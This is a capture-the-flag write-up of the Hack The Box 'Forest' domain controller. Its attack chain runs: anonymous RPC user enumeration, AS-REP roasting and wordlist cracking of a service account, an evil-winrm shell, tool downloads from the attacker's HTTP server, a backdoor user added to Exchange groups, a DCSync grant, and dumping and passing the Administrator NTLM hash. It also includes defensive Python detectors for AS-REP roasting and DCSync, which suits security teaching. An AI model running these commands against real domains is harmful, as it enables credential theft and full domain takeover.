CTF Forest

Forest is an easy-difficulty Windows Domain Controller (DC) for a domain in which Exchange Server has been installed. The DC is found to allow anonymous LDAP binds, which are used to enumerate domain objects. The password for a service account with Kerberos pre-authentication disabled can be cracked to gain a foothold. The service account is found to be a member of the Account Operators group, which can be used to add users to privileged Exchange groups. The Exchange group membership is leveraged to gain DCSync privileges on the domain and dump the NTLM hashes.

Nmap

The provided nmap command has been used to perform a thorough port scan on the target host “forest.htb.” Here’s an overview of the scan’s results:

nmap -sVC -p- forest.htb -vvvv -Pn
  • Port 53 (TCP): Open - Simple DNS Plus
  • Port 88 (TCP): Open - Microsoft Windows Kerberos (Kerberos-sec)
  • Port 135 (TCP): Open - Microsoft Windows RPC
  • Port 139 (TCP): Open - Microsoft Windows netbios-ssn (NetBIOS Session Service)
  • Port 389 (TCP): Open - Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  • Port 445 (TCP): Open - Windows Server 2016 Standard 14393 (Microsoft-DS)
  • Port 464 (TCP): Open - Kerberos Key Distribution Center
  • Port 593 (TCP): Open - Microsoft Windows RPC over HTTP 1.0 (ncacn_http)
  • Port 636 (TCP): Open - TCPwrapped (encrypted LDAP)
  • Port 3268 (TCP): Open - Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
  • Port 3269 (TCP): Open - TCPwrapped (encrypted LDAP)
  • Port 5985 (TCP): Open - Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • Port 9389 (TCP): Open - .NET Message Framing
  • Port 47001 (TCP): Open - Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
  • Port 49664 (TCP): Open - Microsoft Windows RPC
  • Port 49665 (TCP): Open - Microsoft Windows RPC
  • Ports 49666, 49667, 49671, 49676, 49677, 49684, 49706, 49932 (TCP): Open - Microsoft Windows RPC

Additionally, the scan reports the host’s name (“FOREST”) and its operating system (Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)).

The nmap script output also gives details of the host’s SMB configuration and clock. The notable parts are:

| p2p-conficker: 
| Checking for Conficker.C or higher...
| Check 1 (port 5324/tcp): CLEAN (Couldn't connect)
| Check 2 (port 32753/tcp): CLEAN (Couldn't connect)
| Check 3 (port 23443/udp): CLEAN (Timeout)
| Check 4 (port 44587/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h26m49s, deviation: 4h02m30s, median: 6m48s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2023-08-01T22:01:08-07:00
| smb2-time:
| date: 2023-08-02T05:01:07
|_ start_date: 2023-08-02T04:37:05

Add FOREST.htb.local and forest.htb to /etc/hosts, pointing at 10.10.10.161.
Domain: htb.local

RPCBind

The following commands use rpcclient to connect to “forest.htb” over SMB with a null session (empty username, no password) and list the domain users with the enumdomusers command. This gathers the existing domain accounts on the target.

rpcclient -U '' -N forest.htb
enumdomusers

The command queryuser 0x479 retrieves the details of the user with RID 0x479.

queryuser 0x479

List of users

Sebastien Caron
Lucinda Berger
svc-alfresco
Andy Hislip
Mark Brandt
Santi Rodriguez

Get the password of svc-alfresco via Kerberos

Get the hash

To request the hash over Kerberos, the following command is used:

/usr/share/doc/python3-impacket/examples/GetUserSPNs.py -no-pass -dc-ip 10.10.10.161 htb/svc-alfresco -k -debug

This command runs Impacket’s GetUserSPNs.py script without supplying a password (-no-pass). The -dc-ip flag gives the domain controller’s IP address, htb/svc-alfresco is the domain and account name, -k selects Kerberos authentication, and -debug enables debug output.

This is the hash. It is an AS-REP hash (the $krb5asrep$23$ format), which is what an account with Kerberos pre-authentication disabled yields:

$krb5asrep$23$svc-alfresco@HTB:c213afe360b7bcbf08a522dcb423566c$d849f59924ba2b5402b66ee1ef332c2c827c6a5f972c21ff329d7c3f084c8bc30b3f9a72ec9db43cba7fc47acf0b8e14c173b9ce692784b47ae494a4174851ae3fcbff6f839c833d3740b0e349f586cdb2a3273226d183f2d8c5586c25ad350617213ed0a61df199b0d84256f953f5cfff19874beb2cd0b3acfa837b1f33d0a1fc162969ba335d1870b33eea88b510bbab97ab3fec9013e33e4b13ed5c7f743e8e74eb3159a6c4cd967f2f5c6dd30ec590f63d9cc354598ec082c02fd0531fafcaaa5226cbf57bfe70d744fb543486ac2d60b05b7db29f482355a98aa65dff2f

Crack the hash

The command john -wordlist=/usr/share/wordlists/rockyou.txt hash runs John the Ripper against the saved hash (in the file “hash”) using the rockyou.txt wordlist.

john -wordlist=/usr/share/wordlists/rockyou.txt hash

Password of svc-alfresco: s3rvice
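From the defender’s side, the two things worth checking for the step above are which accounts have pre-authentication disabled (the condition that makes the AS-REP hash obtainable) and whether the domain controller logged such a request. The following Python is an added example, not code from the original write-up: it audits constructed userAccountControl values and then flags Security Event 4768 records with Pre-Authentication Type 0 and an RC4 (0x17) ticket. The account list and log lines are constructed, and the key=value layout is an assumed log-shipper flattening of the event.

```python
"""Added defensive check (not from the original write-up): (1) list enabled
accounts whose userAccountControl has DONT_REQ_PREAUTH set, the condition
that makes AS-REP roasting of svc-alfresco possible, and (2) flag Security
Event 4768 records with Pre-Authentication Type 0 and an RC4 (0x17) ticket,
the pattern the request above leaves on the domain controller.
Account data and log lines are constructed; the key=value layout is an
assumed log-shipper flattening of the event."""
import re

# userAccountControl bit flags from the AD schema
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed (sAMAccountName, userAccountControl) pairs as an LDAP query would return them
SAMPLE_ACCOUNTS = [
    ("svc-alfresco", 0x410200),  # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH
    ("sebastien", 0x10200),      # NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD
    ("old-svc", 0x400202),       # pre-auth disabled but the account itself is disabled
]

def asrep_exposed(accounts):
    """Return enabled accounts that do not require Kerberos pre-authentication."""
    return [name for name, uac in accounts
            if uac & DONT_REQ_PREAUTH and not uac & ACCOUNTDISABLE]

# Constructed 4768 (TGT request) records; the first is what an AS-REP roast looks like
SAMPLE_4768 = """\
EventID=4768 TargetUserName=svc-alfresco PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.23
EventID=4768 TargetUserName=sebastien PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.50
EventID=4768 TargetUserName=svc-alfresco PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.50
EventID=4769 TargetUserName=sebastien PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.14.23
"""

FIELD = re.compile(r"(\w+)=(\S+)")

def asrep_roast_hits(log_text):
    """Return (user, source ip) for 4768 events with no pre-auth and an RC4 ticket."""
    hits = []
    for line in log_text.splitlines():
        ev = dict(FIELD.findall(line))
        if ev.get("EventID") != "4768":
            continue  # only TGT requests carry the pre-auth type we care about
        if ev.get("PreAuthType") == "0" and ev.get("TicketEncryptionType", "").lower() == "0x17":
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits

if __name__ == "__main__":
    print("pre-auth not required:", asrep_exposed(SAMPLE_ACCOUNTS))
    print("AS-REP roast candidates:", asrep_roast_hits(SAMPLE_4768))
```

The remediation is to clear the “Do not require Kerberos preauthentication” flag on such accounts, or at least give them long random passwords so the captured hash cannot be cracked with a wordlist as it was here.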

Get a shell with evil-winrm

The command evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice establishes remote Windows access using “evil-winrm” with the specified credentials.

evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

evil-winrm provides a convenient command-line interface for interacting with Windows systems remotely over WinRM (Windows Remote Management).

Enumeration with BloodHound

SharpHound

To transfer and run the SharpHound collector, the following sequence of commands is used:

  • On the attacking machine, start a Python 2.7 HTTP server to host the file:

    python2.7 -m SimpleHTTPServer
  • On the target, use PowerShell’s Invoke-WebRequest to download it from that server:

    Invoke-WebRequest -Uri "http://10.10.14.23:8000/SharpHound.exe" -OutFile "SharpHound.exe"
  • Run the downloaded SharpHound collector against the domain:

    ./SharpHound.exe -d htb.local

BloodHound

Now drag and drop the data SharpHound collected into BloodHound.
Then open “Analysis” and run “Find Shortest Paths to Domain Admins”.

Grant DCSync Privileges

  • Create a new user:

    net user peanut peanutpeanut /add /domain

We have to add the user to two groups, “EXCHANGE WINDOWS PERMISSIONS” and “Remote Management Users”.
There are two ways to add a user to a group; the first does not work for the Remote Management Users group (it is a built-in local group, so net group, which manages global groups, cannot add members to it).

# First solution
net group "EXCHANGE WINDOWS PERMISSIONS" peanut /add /domain

# Second solution
$Group2 = Get-ADGroup -Identity "CN=Remote Management Users,CN=Builtin,DC=htb,DC=local"
Add-ADGroupMember -Identity $Group2 -Members peanut

Check the group memberships; if you are not fast enough, you will probably need to add the user to the groups again.

net user peanut

WriteDacl Exploit

PowerView.ps1 & Mimikatz upload

  • Download PowerView.ps1 & Invoke-Mimikatz.ps1 on the attacking machine:

    wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
    wget https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
  • Start a Python HTTP server to host the files:

    python2.7 -m SimpleHTTPServer
  • On the target, download these files:

    Invoke-WebRequest -Uri "http://10.10.14.23:8000/PowerView.ps1" -OutFile "PowerView.ps1"
    Invoke-WebRequest -Uri "http://10.10.14.23:8000/Invoke-Mimikatz.ps1" -OutFile "Invoke-Mimikatz.ps1"

Get the hashes - Method 1 (secretsdump.py)

The provided commands guide you through various actions involving connecting to the target, importing scripts, and modifying domain object ACLs. Here’s an overview of each step:

  • Connect to the target with the new account:

    evil-winrm -i 10.10.10.161 -u peanut -p peanutpeanut
  • Start PowerShell with the execution policy bypassed:

    powershell -ep bypass
  • Import PowerView.ps1:

    Import-Module ./PowerView.ps1
  • Modify the domain object’s ACL. This grants peanut the DCSync replication rights on the htb.local domain object; the -Credential re-authenticates as peanut so that the new group membership is in effect (Add-DomainObjectAcl needs an explicit -PrincipalIdentity, and the credential must be peanut’s own):

    $SecPassword = ConvertTo-SecureString 'peanutpeanut' -AsPlainText -Force
    $Cred = New-Object System.Management.Automation.PSCredential('HTB\peanut', $SecPassword)

    Add-DomainObjectAcl -Credential $Cred -PrincipalIdentity 'peanut' -TargetIdentity 'htb.local' -Rights DCSync

Get the Administrator hash

We use the secretsdump.py script to extract credentials from “forest.htb” with the “peanut” username and password (the DCSync right granted above lets a replication request return the password hashes).

/usr/share/doc/python3-impacket/examples/secretsdump.py peanut:peanutpeanut@forest.htb


We found the Administrator hash (the LM:NT pair aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6; evil-winrm takes the NT half with -H).
Connect with evil-winrm:

evil-winrm -i forest.htb -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6

Get the hashes - Method 2 (Invoke-Mimikatz.ps1)

Connect to the target with the new account.

evil-winrm -i 10.10.10.161 -u peanut -p peanutpeanut

Then use Mimikatz to dump the hashes.

  • Import the PowerShell modules:

    Import-Module ./Invoke-Mimikatz.ps1
    Import-Module ./PowerView.ps1

    These commands load the Invoke-Mimikatz.ps1 and PowerView.ps1 scripts, making their functions available.

  • Modify the domain object’s ACL:

    Add-DomainObjectAcl -TargetIdentity htb -PrincipalIdentity peanut -Rights DCSync -Verbose 2>&1

    This command grants the “peanut” user DCSync rights on the “htb” domain (the directory replication rights on the domain object that let a principal request password hashes the way a domain controller does), which allows credential extraction.

  • Invoke Mimikatz for DCSync:

    Invoke-MimiKatz -Command """lsadump::dcsync /domain:htb.local /user:Administrator"""

    This command uses Mimikatz to request, via a replication call, and dump the NTLM hash of the “Administrator” user in the “htb.local” domain.


Connect to Administrator account with evil-winrm :

evil-winrm -i forest.htb -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
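Both hash-dumping methods above rely on the same thing: a replication request from an account that is not a domain controller. On the DC that request is logged as Security Event 4662 on the domain object, with the directory replication control-access-right GUIDs in the Properties field. The following Python is an added detection example, not code from the original write-up; the log lines are constructed and the key=value layout is an assumed flattening of the event.

```python
"""Added detection example (not from the original write-up): a DCSync, as
performed above by peanut, shows up on the domain controller as Security
Event 4662 on the domain object whose Properties contain the directory
replication control-access-right GUIDs. Such a request from anything
other than a domain controller computer account is the signal.
Requires the Directory Service Access audit subcategory to be enabled.
Log lines are constructed; the key=value layout is an assumed flattening."""
import re

# Control access rights a replication (DRSGetNCChanges) request asks for
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}

# Constructed 4662 records: DC-to-DC replication by FOREST$, then peanut's DCSync,
# then an unrelated 4662 and a non-4662 event. Properties GUIDs are joined with ';'
SAMPLE_4662 = """\
EventID=4662 SubjectUserName=FOREST$ ObjectName=DC=htb,DC=local Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=peanut ObjectName=DC=htb,DC=local Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=peanut ObjectName=CN=peanut,CN=Users,DC=htb,DC=local Properties=bf967a86-0de6-11d0-a285-00aa003049e2
EventID=4624 SubjectUserName=peanut ObjectName=- Properties=-
"""

FIELD = re.compile(r"(\w+)=(\S+)")

def is_computer_account(name):
    """Computer accounts (including domain controllers) end in '$'."""
    return name.endswith("$")

def dcsync_hits(log_text):
    """Return (user, object, [rights]) for 4662 events where a non-computer
    principal requested replication rights."""
    hits = []
    for line in log_text.splitlines():
        ev = dict(FIELD.findall(line))
        if ev.get("EventID") != "4662":
            continue
        guids = ev.get("Properties", "").lower().split(";")
        rights = [REPL_GUIDS[g] for g in guids if g in REPL_GUIDS]
        if rights and not is_computer_account(ev["SubjectUserName"]):
            hits.append((ev["SubjectUserName"], ev["ObjectName"], rights))
    return hits

if __name__ == "__main__":
    for user, obj, rights in dcsync_hits(SAMPLE_4662):
        print(f"DCSync by {user} on {obj}: {', '.join(rights)}")
```

Excluding every account ending in “$” is a shortcut for this example; in production compare the subject against the known list of domain controllers, and alert on any WriteDacl or membership change to the Exchange Windows Permissions and Account Operators groups that made the grant possible in the first place.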